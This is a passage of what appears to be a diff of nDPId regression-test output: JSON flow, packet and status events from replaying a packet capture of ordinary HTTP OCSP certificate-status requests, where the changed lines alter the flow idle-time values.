{"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223091709,"flow_last_seen":1623223091709,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223091709,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623223091709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091709,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8XL5AAEAGBDzAqAGAl4uADoYkAFDUes8oAAAAAKAC+vBwKQAAAgQFtAQCCArLCQ4CAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACb3tkC"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623223091736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091736,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAC8GcfqXi4AOwKgBgABQhiREDjpk1HrPKaAS\/\/+ohwAAAgQFtAQCCAp7mshzywkOAgEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvlhtb"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623223091739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091739,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0XL9AAEAGBEPAqAGAl4uADoYkAFDUes8pRA46ZYAQAfbVQAAAAQEICssJDiB7mshzGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApa33FQ=="} +00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":158,"packets-processed":157,"total-skipped-flows":0,"total-l4-data-len":15999,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1623226796047} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226796047,"flow_last_seen":1623226796047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1623226796047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796047,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8IiFAAEAGHJ3AqAGAXbjcHbsgAFDKwHZTAAAAAKAC+vANzwAAAgQFtAQCCArJnn0eAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC2uJMq"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1623226796050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796050,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8OIIAADgGTjxduNwdwKgBgABQuyB0cdYZysB2VKAS\/\/931wAAAgQFtAQCCAqXTK79yZ59HgEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApvHVR"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1623226796054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623226796054,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0IiJAAEAGHKTAqAGAXbjcHbsgAFDKwHZUdHHWGoAQAfakpwAAAQEICsmefSaXTK79GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5srZww=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226796047,"flow_last_seen":1623226796047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1623226796047,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796047,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8IiFAAEAGHJ3AqAGAXbjcHbsgAFDKwHZTAAAAAKAC+vANzwAAAgQFtAQCCArJnn0eAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC2uJMq"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1623226796050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796050,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8OIIAADgGTjxduNwdwKgBgABQuyB0cdYZysB2VKAS\/\/931wAAAgQFtAQCCAqXTK79yZ59HgEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApvHVR"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1623226796054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623226796054,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0IiJAAEAGHKTAqAGAXbjcHbsgAFDKwHZUdHHWGoAQAfakpwAAAQEICsmefSaXTK79GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5srZww=="} +00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":208,"packets-processed":207,"total-skipped-flows":0,"total-l4-data-len":19557,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1623227471703} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227471703,"flow_last_seen":1623227471703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1623227471703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471703,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CDlAAEAGLKrAqAGANFUPXMDmAFDpM3mLAAAAAKAC+vAljwAAAgQFtAQCCArD2jnWAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU0JsT"} -00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1623227471715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471715,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8PJoAAPMGhUg0VQ9cwKgBgABQwOYt\/4+26TN5jKAS\/\/9VQwAAAgQFoAQCCAoCPQtLw9o51gEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrMGLg"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1623227471719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227471719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0CDpAAEAGLLHAqAGANFUPXMDmAFDpM3mMLf+Pt4AQAfaB9gAAAQEICsPaOecCPQtLGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY2fOA=="} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227472211,"flow_last_seen":1623227472211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227472211,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1623227472211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472211,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8cDxAAEAGbm3AqAGAl2UCheoSAFClxR9VAAAAAKAC+vA6IAAAAgQFtAQCCApcSasVAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAbRut"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1623227472214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472214,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADYG6KmXZQKFwKgBgABQ6hJzFOMDpcUfVqAS\/\/9zqQAAAgQFTAQCCAoCSmlaXEmrFQEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkey68"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1623227472218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227472218,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0cD1AAEAGbnTAqAGAl2UCheoSAFClxR9WcxTjBIAQAfagEQAAAQEIClxJqx0CSmlaGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyO91A=="} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227471703,"flow_last_seen":1623227471703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1623227471703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471703,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CDlAAEAGLKrAqAGANFUPXMDmAFDpM3mLAAAAAKAC+vAljwAAAgQFtAQCCArD2jnWAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU0JsT"} +00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1623227471715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471715,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8PJoAAPMGhUg0VQ9cwKgBgABQwOYt\/4+26TN5jKAS\/\/9VQwAAAgQFoAQCCAoCPQtLw9o51gEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrMGLg"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1623227471719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227471719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0CDpAAEAGLLHAqAGANFUPXMDmAFDpM3mMLf+Pt4AQAfaB9gAAAQEICsPaOecCPQtLGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY2fOA=="} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227472211,"flow_last_seen":1623227472211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227472211,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 